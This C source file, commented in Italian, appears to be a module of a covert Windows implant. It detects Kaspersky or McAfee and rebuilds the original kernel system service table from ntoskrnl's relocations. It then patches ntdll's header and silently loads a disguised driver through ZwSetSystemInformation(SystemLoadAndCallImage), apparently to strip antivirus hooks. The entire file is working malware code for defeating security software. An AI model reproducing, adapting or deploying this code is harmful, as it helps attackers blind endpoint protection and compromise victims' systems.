/*typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
#ifdef MIDL_PASS
    [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
    PWSTR  Buffer;
#endif // MIDL_PASS
} UNICODE_STRING, *PUNICODE_STRING;*/

#define PREAMBLE_SIZE 10
#pragma pack(1)
typedef struct fixup_entry {
	DWORD func_addr;
	unsigned char func_preamble[PREAMBLE_SIZE];
} fu_entry;
#pragma pack()

typedef long NTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

struct FixupBlock {
	unsigned long pageRVA;
	unsigned long blockSize;
};

struct PE_Header 
{
	unsigned long signature;
	unsigned short machine;
	unsigned short numSections;
	unsigned long timeDateStamp;
	unsigned long pointerToSymbolTable;
	unsigned long numOfSymbols;
	unsigned short sizeOfOptionHeader;
	unsigned short characteristics;
};

struct PE_ExtHeader
{
	unsigned short magic;
	unsigned char majorLinkerVersion;
	unsigned char minorLinkerVersion;
	unsigned long sizeOfCode;
	unsigned long sizeOfInitializedData;
	unsigned long sizeOfUninitializedData;
	unsigned long addressOfEntryPoint;
	unsigned long baseOfCode;
	unsigned long baseOfData;
	unsigned long imageBase;
	unsigned long sectionAlignment;
	unsigned long fileAlignment;
	unsigned short majorOSVersion;
	unsigned short minorOSVersion;
	unsigned short majorImageVersion;
	unsigned short minorImageVersion;
	unsigned short majorSubsystemVersion;
	unsigned short minorSubsystemVersion;
	unsigned long reserved1;
	unsigned long sizeOfImage;
	unsigned long sizeOfHeaders;
	unsigned long checksum;
	unsigned short subsystem;
	unsigned short DLLCharacteristics;
	unsigned long sizeOfStackReserve;
	unsigned long sizeOfStackCommit;
	unsigned long sizeOfHeapReserve;
	unsigned long sizeOfHeapCommit;
	unsigned long loaderFlags;
	unsigned long numberOfRVAAndSizes;
	unsigned long exportTableAddress;
	unsigned long exportTableSize;
	unsigned long importTableAddress;
	unsigned long importTableSize;
	unsigned long resourceTableAddress;
	unsigned long resourceTableSize;
	unsigned long exceptionTableAddress;
	unsigned long exceptionTableSize;
	unsigned long certFilePointer;
	unsigned long certTableSize;
	unsigned long relocationTableAddress;
	unsigned long relocationTableSize;
	unsigned long debugDataAddress;
	unsigned long debugDataSize;
	unsigned long archDataAddress;
	unsigned long archDataSize;
	unsigned long globalPtrAddress;
	unsigned long globalPtrSize;
	unsigned long TLSTableAddress;
	unsigned long TLSTableSize;
	unsigned long loadConfigTableAddress;
	unsigned long loadConfigTableSize;
	unsigned long boundImportTableAddress;
	unsigned long boundImportTableSize;
	unsigned long importAddressTableAddress;
	unsigned long importAddressTableSize;
	unsigned long delayImportDescAddress;
	unsigned long delayImportDescSize;
	unsigned long COMHeaderAddress;
	unsigned long COMHeaderSize;
	unsigned long reserved2;
	unsigned long reserved3;
};


struct SectionHeader
{
	unsigned char sectionName[8];
	unsigned long virtualSize;
	unsigned long virtualAddress;
	unsigned long sizeOfRawData;
	unsigned long pointerToRawData;
	unsigned long pointerToRelocations;
	unsigned long pointerToLineNumbers;
	unsigned short numberOfRelocations;
	unsigned short numberOfLineNumbers;
	unsigned long characteristics;
};

struct MZHeader
{
	unsigned short signature;
	unsigned short partPag;
	unsigned short pageCnt;
	unsigned short reloCnt;
	unsigned short hdrSize;
	unsigned short minMem;
	unsigned short maxMem;
	unsigned short reloSS;
	unsigned short exeSP;
	unsigned short chksum;
	unsigned short exeIP;
	unsigned short reloCS;
	unsigned short tablOff;
	unsigned short overlay;
	unsigned char reserved[32];
	unsigned long offsetToPE;
};

typedef struct _SYSTEM_MODULE_INFORMATION {//Information Class 11
    ULONG    Reserved[2];
    PVOID    Base;
    ULONG    Size;
    ULONG    Flags;
    USHORT    Index;
    USHORT    Unknown;
    USHORT    LoadCount;
    USHORT    ModuleNameOffset;
    CHAR    ImageName[256];
}SYSTEM_MODULE_INFORMATION,*PSYSTEM_MODULE_INFORMATION;

typedef struct {
    DWORD    dwNumberOfModules;
    SYSTEM_MODULE_INFORMATION    smi;
} MODULES, *PMODULES;
#define STATUS_INFO_LENGTH_MISMATCH      ((NTSTATUS)0xC0000004L)
#define SystemModuleInformation    11

NTSTATUS (__stdcall *NtQuerySystemInformation)(    
    DWORD    SystemInformationClass,
    PVOID    SystemInformation,
    ULONG    SystemInformationLength,
    PULONG    ReturnLength
    );

NTSTATUS (__stdcall *ZwSetSystemInformation)(
  IN DWORD SystemInformationClass,
  IN OUT PVOID SystemInformation,
  IN ULONG SystemInformationLength
  );

VOID (__stdcall *RtlInitUnicodeString)(
  IN OUT PUNICODE_STRING  DestinationString,
  IN PCWSTR  SourceString
  );

typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
 UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;
#define SystemLoadAndCallImage 38

#define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))
#define ibaseDD *(PDWORD)&ibase
#define MAGIC 0x30090000
#define DRIVER_PATH "\\??\\"
#define DRIVER_PATH2 "\\system32\\drivers\\"
#define DRIVER_NAME "MSDRV1.SYS" // XXX Si deve chiamare come il nome che ha nel driver
#define FIX_PREAMBLE(FUNC_NAME)		{DWORD j;\
									 j = func_index(FUNC_NAME);\
									 if (j!=0xFFFFFFFF)\
									 memcpy(new_sdt[j].func_preamble, (const char *)((DWORD)hKernel + new_sdt[j].func_addr), PREAMBLE_SIZE);}


typedef struct {
    WORD    offset:12;
    WORD    type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;


DWORD GetHeaders(PCHAR ibase,
                PIMAGE_FILE_HEADER *pfh,
                PIMAGE_OPTIONAL_HEADER *poh,
                PIMAGE_SECTION_HEADER *psh)

{
    PIMAGE_DOS_HEADER mzhead = (PIMAGE_DOS_HEADER)ibase;
    
    if ((mzhead->e_magic!=IMAGE_DOS_SIGNATURE) || (ibaseDD[mzhead->e_lfanew]!=IMAGE_NT_SIGNATURE))
		return FALSE;
    
    *pfh = (PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew];
    if (((PIMAGE_NT_HEADERS)*pfh)->Signature!=IMAGE_NT_SIGNATURE) 
        return FALSE;

    *pfh = (PIMAGE_FILE_HEADER)((PBYTE)*pfh+sizeof(IMAGE_NT_SIGNATURE));
    
    *poh = (PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh+sizeof(IMAGE_FILE_HEADER));
    if ((*poh)->Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC)
        return FALSE;
    
    *psh = (PIMAGE_SECTION_HEADER)((PBYTE)*poh+sizeof(IMAGE_OPTIONAL_HEADER));
    return TRUE;
}


DWORD FindKiServiceTable(HMODULE hModule, DWORD dwKSDT)
{
    PIMAGE_FILE_HEADER     pfh;
    PIMAGE_OPTIONAL_HEADER poh;
    PIMAGE_SECTION_HEADER  psh;
    PIMAGE_BASE_RELOCATION pbr;
    PIMAGE_FIXUP_ENTRY     pfe;    
    
    DWORD dwFixups = 0, i, dwPointerRva, dwPointsToRva, dwKiServiceTable;
    BOOL  bFirstChunk;

    if (!GetHeaders((PCHAR)hModule, &pfh, &poh, &psh))
		return 0;

    // Cerca nella lista dei reloc per trovare la mov di inizializzazione
    if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&
        (!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) {
        
        pbr = (PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress, hModule);

        bFirstChunk = TRUE;
        while (bFirstChunk || pbr->VirtualAddress) {
            bFirstChunk = FALSE;
            pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION));

            for (i=0;i<(pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;i++,pfe++) {
				DWORD gino = (pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;
                if (pfe->type==IMAGE_REL_BASED_HIGHLOW) {
                    dwFixups++;
                    dwPointerRva=pbr->VirtualAddress+pfe->offset;
                    dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh->ImageBase;

					if (dwPointsToRva==dwKSDT) {
                        if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7) {
                            dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh->ImageBase;
                            return dwKiServiceTable;
                        }
                    }                  
                } 
            }
            *(PDWORD)&pbr += pbr->SizeOfBlock;
        }
    }    
    return 0;
}

void a2w(char *src, char *dst)
{
	DWORD i=0;
	do {
		dst[i*2] = src[i];
		dst[i*2+1] = 0;
	} while(src[i++]);
}

BOOL LoadDriver()
{
	SYSTEM_LOAD_AND_CALL_IMAGE mod_image;
	char sys_path[DLLNAMELEN];
	char comp_path[DLLNAMELEN*2];
	char comp_log_path[DLLNAMELEN*2];
	char wcomp_path[DLLNAMELEN*4];


	memset(sys_path, 0, sizeof(sys_path));
	memset(comp_path, 0, sizeof(comp_path));
	memset(comp_log_path, 0, sizeof(comp_log_path));
	memset(wcomp_path, 0, sizeof(wcomp_path));

	if (GetEnvironmentVariable("SystemRoot", sys_path, sizeof(sys_path)) == 0)
		return FALSE;
	sprintf(comp_path, "%s%s%s", sys_path, DRIVER_PATH2, DRIVER_NAME);
	sprintf(comp_log_path, "%s%s%s%s", DRIVER_PATH, sys_path, DRIVER_PATH2, DRIVER_NAME);

	// Copia il file dalla directory temporanea (solo la prima volta)
	// XXX Vede come si dovrebbe chiamare il file (prendendolo dal nome del file dummy)
	char *drv_scramb_name;
	if ( !(drv_scramb_name = LOG_ScrambleName(H4_DUMMY_NAME, 1, TRUE)) )
		return FALSE;
	MoveFileEx(HM_CompletePath(drv_scramb_name, sys_path), comp_path, MOVEFILE_WRITE_THROUGH);
	SAFE_FREE(drv_scramb_name);

	a2w(comp_log_path, wcomp_path);
	if (!(RtlInitUnicodeString = (void (__stdcall *)(PUNICODE_STRING,PCWSTR)) GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlInitUnicodeString")))
		return FALSE;

	if (!(ZwSetSystemInformation = (NTSTATUS (__stdcall *)(DWORD,PVOID,ULONG)) GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetSystemInformation")))
		return FALSE;
	RtlInitUnicodeString( &(mod_image.ModuleName), (PCWSTR)wcomp_path);

	DWORD i;
#define MAX_RETRY 5
	for (i=0; i<MAX_RETRY; i++) {
		if (NT_SUCCESS(ZwSetSystemInformation(SystemLoadAndCallImage, &mod_image, sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)))) 
			break;
		Sleep(500);
	}	
	Sleep(500); // Aspetta che il driver abbia fatto il suo dovere
	return TRUE;
}


BOOL IsMcAfee()
{
	if (HM_FindPid("mcsysmon.exe", FALSE))
		return TRUE;
	return FALSE;
}

BOOL IsKaspersky()
{
	WIN32_FIND_DATA fdata;
	char buffer[DLLNAMELEN];
	HANDLE hff;

	ZeroMemory(buffer, sizeof(buffer));
	GetEnvironmentVariable("SYSTEMROOT", buffer, sizeof(buffer));
	strcat(buffer, "\\system32\\drivers\\klif.sys");
	
	hff = FindFirstFile(buffer, &fdata);
	if (hff == INVALID_HANDLE_VALUE)
		return FALSE;
	FindClose(hff);
	
	ZeroMemory(buffer, sizeof(buffer));
	GetEnvironmentVariable("SYSTEMROOT", buffer, sizeof(buffer));
	strcat(buffer, "\\system32\\drivers\\kl1.sys");

	hff = FindFirstFile(buffer, &fdata);
	if (hff == INVALID_HANDLE_VALUE) 
		return FALSE;
	FindClose(hff);

	return TRUE;
}


BOOL IsDrv()
{
	LPVOID drivers[4096];
	DWORD cbNeeded;
	int cDrivers, i;

	if( EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) { 
		char szDriver[1024];
		cDrivers = cbNeeded/sizeof(drivers[0]);
		for (i=0; i < cDrivers; i++ ) {
			if(GetDeviceDriverBaseName(drivers[i], szDriver, sizeof(szDriver)/sizeof(szDriver[0]))) { 
				if (!stricmp(szDriver, DRIVER_NAME))
					return TRUE;
			}
		}
	}
	return FALSE;
}


DWORD func_index(char *func_name)
{
	BYTE *func_ptr;
	DWORD *index_ptr;
	HMODULE hntdll = GetModuleHandle("NTDLL.DLL");
	func_ptr = (BYTE *)GetProcAddress(hntdll, func_name);
	if (!func_ptr)
		return 0xFFFFFFFF;

	index_ptr = (DWORD *)(func_ptr + 1);
	return *index_ptr;
}

PVOID FindKernelBase()
{
    DWORD dwNeededSize,rc;
	PMODULES pModules=(PMODULES)&pModules;
	HMODULE hNTDLL = GetModuleHandle("NTDLL.dll");

	NtQuerySystemInformation = (NTSTATUS(__stdcall *)(DWORD,PVOID,ULONG,PULONG))GetProcAddress(hNTDLL, "NtQuerySystemInformation");
	if (!NtQuerySystemInformation)
		return 0;
    rc = NtQuerySystemInformation(SystemModuleInformation,pModules,4,&dwNeededSize);

    if( rc==STATUS_INFO_LENGTH_MISMATCH ) {
		if ( !(pModules = (PMODULES) GlobalAlloc(GPTR,dwNeededSize)) )
			return 0;
        rc = NtQuerySystemInformation(SystemModuleInformation,pModules,dwNeededSize,NULL);
		if (!NT_SUCCESS(rc)) {
			GlobalFree(pModules);
			return 0;
		}
    } else 
        return 0;
	
    return (PVOID)pModules->smi.Base;
}

BOOL readPEInfo(char *modulePos, MZHeader *outMZ, PE_Header *outPE, PE_ExtHeader *outpeXH, SectionHeader **outSecHdr)
{
	MZHeader *mzH;
	mzH = (MZHeader *)modulePos;

	if(mzH->signature != 0x5a4d)
		return FALSE;

	PE_Header *peH;
	peH = (PE_Header *)(modulePos + mzH->offsetToPE);

	if(peH->sizeOfOptionHeader != sizeof(PE_ExtHeader))
		return FALSE;

	PE_ExtHeader *peXH;
	peXH = (PE_ExtHeader *)((char *)peH + sizeof(PE_Header));

	SectionHeader *secHdr = (SectionHeader *)((char *)peXH + sizeof(PE_ExtHeader));

	*outMZ = *mzH;
	*outPE = *peH;
	*outpeXH = *peXH;
	*outSecHdr = secHdr;

	return TRUE;
}

BOOL RelocImage(PVOID exeAddr, PVOID newAddr)
{
	MZHeader mzH2;
	PE_Header peH2;
	PE_ExtHeader peXH2;
	SectionHeader *secHdr2;

	if (!exeAddr || !newAddr)
		return FALSE;

	if(!readPEInfo((char *)exeAddr, &mzH2, &peH2, &peXH2, &secHdr2))
		return FALSE;

	if(peXH2.relocationTableAddress && peXH2.relocationTableSize) {
		FixupBlock *fixBlk = (FixupBlock *)((char *)exeAddr + peXH2.relocationTableAddress);		

		while(fixBlk->blockSize) {
			int numEntries = (fixBlk->blockSize - sizeof(FixupBlock)) >> 1;
			unsigned short *offsetPtr = (unsigned short *)(fixBlk + 1);
			for(int i = 0; i < numEntries; i++)	{				
				int relocType = (*offsetPtr & 0xF000) >> 12;
				if(relocType == 3) {
					DWORD *codeLoc = (DWORD *)((char *)exeAddr + fixBlk->pageRVA + (*offsetPtr & 0x0FFF));					
					DWORD delta = (DWORD)newAddr - (DWORD)peXH2.imageBase;					
					DWORD value = (*codeLoc) + delta;
					DWORD dummy;
					if (!WriteProcessMemory(GetCurrentProcess(), codeLoc, &value, sizeof(DWORD), &dummy))
						return FALSE;
				}
				offsetPtr++;
			}
			fixBlk = (FixupBlock *)offsetPtr;
		}
		return TRUE;
	}
	return FALSE;
}



// XXX VA CHIAMATA DOPO LA GUESS NAME (magari dopo la clear PEB e command line)
// Se torna FALSE vuol dire che c'e' Kaspersky e non sono riuscito a fare l'unhook (potrei far
// uscire il processo in questo caso...) Non puo' fare uninstall perche' non puo' iniettare
// thread
BOOL WINAPI doUnhook()
{    
    HMODULE hKernel;
    DWORD   dwKSDT;              
    DWORD   dwKiServiceTable;    
    DWORD   dwServices = 0;
    PDWORD  pService;
	DWORD   dummy;
	DWORD	dwNeededSize;
	DWORD   *fix_add;
    PIMAGE_FILE_HEADER     pfh;
    PIMAGE_OPTIONAL_HEADER poh;
    PIMAGE_SECTION_HEADER  psh;
	PMODULES pModules=(PMODULES)&pModules;
	NTSTATUS rc;

	// XXX Se NON trova n Kaspersky n McAfee torna TRUE senza fare niente
	if (!IsKaspersky() && !IsMcAfee())
		return TRUE;

	// Se il driver e' gia' caricato ritorna TRUE senza fare niente
	if (IsDrv())
		return TRUE;

	if ( !(NtQuerySystemInformation = (NTSTATUS(__stdcall *)(DWORD,PVOID,ULONG,PULONG))GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwQuerySystemInformation")) )
		return FALSE;
	rc = NtQuerySystemInformation(SystemModuleInformation, pModules, 4, &dwNeededSize);
    if (rc == STATUS_INFO_LENGTH_MISMATCH) {
        if ( !(pModules = (PMODULES)GlobalAlloc(GPTR, dwNeededSize)) )
			return FALSE;
        rc = NtQuerySystemInformation(SystemModuleInformation, pModules, dwNeededSize, NULL);
		if (!NT_SUCCESS(rc)) {
			GlobalFree(pModules);
			return FALSE;
		}
    } else
		return FALSE;

    // Carica ntoskrnl come dll
	if ( !(hKernel = LoadLibraryEx(pModules->smi.ModuleNameOffset+pModules->smi.ImageName, 0, DONT_RESOLVE_DLL_REFERENCES)) )  {
		GlobalFree(pModules);
        return FALSE;        
	}
	GlobalFree(pModules);
	
	if (!(dwKSDT = (DWORD)GetProcAddress(hKernel, "KeServiceDescriptorTable"))) {
	    FreeLibrary(hKernel);
        return FALSE;
	}
 
    // Prende l'RVA di KeServiceDescriptorTable...
    dwKSDT -= (DWORD)hKernel;    
    // ...e cerca l'indirizzo alla ServiceTable tramite le reloc
	if (!(dwKiServiceTable = FindKiServiceTable(hKernel, dwKSDT))) {
	    FreeLibrary(hKernel);
        return FALSE;
	}

	// Legge la preferred base del kernel
	if (!GetHeaders((PCHAR)hKernel, &pfh, &poh, &psh)) {
		FreeLibrary(hKernel);
		return FALSE;
	}
	// e cerca il numero di entry nella sdt originale
	for (pService = (PDWORD)((DWORD)hKernel + dwKiServiceTable);
         *pService - poh->ImageBase < poh->SizeOfImage;
		 pService++, dwServices++);

	// Crea una nuova "finta" sdt
	fu_entry *new_sdt = (fu_entry *)VirtualAlloc(NULL, dwServices*sizeof(fu_entry), MEM_COMMIT, PAGE_EXECUTE_READWRITE | PAGE_NOCACHE);
	if (!new_sdt)
		return FALSE;
	pService = (PDWORD)((DWORD)hKernel + dwKiServiceTable);
	for (DWORD i = 0; i<dwServices; i++) 
		new_sdt[i].func_addr = pService[i] - poh->ImageBase;
	
	if (!RelocImage(hKernel, FindKernelBase())) 
		return FALSE;

	// Copia anche i preamboli delle funzioni
	for (DWORD i = 0; i<dwServices; i++) 
		memset(new_sdt[i].func_preamble, 0, PREAMBLE_SIZE);
	FIX_PREAMBLE("ZwSetValueKey");

    FreeLibrary(hKernel);

	// Scrive i parametri nell'header di ntdll
	fix_add = (DWORD *)GetModuleHandle("ntdll.dll");
	if (!VirtualProtect(fix_add, 64, PAGE_EXECUTE_READWRITE, &dummy))
		return FALSE;

	fix_add += 7;
	*fix_add = (DWORD)new_sdt;
	fix_add++;
	*fix_add = (dwServices | MAGIC);

	// Carica il driver
	return LoadDriver();
}
